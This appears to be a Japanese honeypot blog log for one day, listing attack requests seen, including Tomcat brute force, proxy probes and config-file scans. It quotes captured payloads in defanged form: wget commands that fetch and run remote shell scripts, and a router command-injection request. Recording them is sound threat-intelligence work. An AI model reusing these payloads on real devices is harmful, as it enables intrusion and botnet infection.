WOWHoneypot観察(286日目)
2019/12/27(金)
トータルは198件でした。
ハンティングログは以下です。
197.33.201[.]44 wget hxxp[:]//185.132.53[.]119/Venom.sh |
www.virustotal.com
www.virustotal.com
186.251.249[.]239 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
116 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
32 | アクセス | GET / |
3 | 不正中継の試み | CONNECT www.sogou.com:443 |
2 | GET /Telerik.Web.UI.WebResource.axd?type=rau | |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不正中継の調査 | GET hxxp[:]//www.ceek.jp/?0.80706506587397491405804 |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | 不正中継の調査 | GET hxxp[:]//mail.21cn.com/?0.3482348302435040470080 |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000076.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000069.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000068.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000067.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000066.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000054.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000046.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000045.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000038.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000035.cfg |
1 | Yealink製品のcfgファイルの調査 | GET /yealink/y000000000034.cfg |
1 | 不明 | GET /templets/lurd//lurd-add.htm |
1 | cfgファイルの調査 | GET /provisioning/y000000000076.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000068.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000067.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000066.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000053.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000052.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000046.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000045.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000044.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000038.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000036.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000035.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000034.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000032.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000031.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000029.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000028.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000025.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000023.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000007.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000005.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000004.cfg |
1 | cfgファイルの調査 | GET /provisioning/y000000000000.cfg |
1 | phpMyAdminの調査 | GET /phpmyadmin/ |
1 | ルーターの脆弱性を狙った通信 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ |
1 | phpMyAdminの調査 | GET /admin/config.php |
1 | 不正中継の試み不正中継の試み | CONNECT www.ipip.net:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |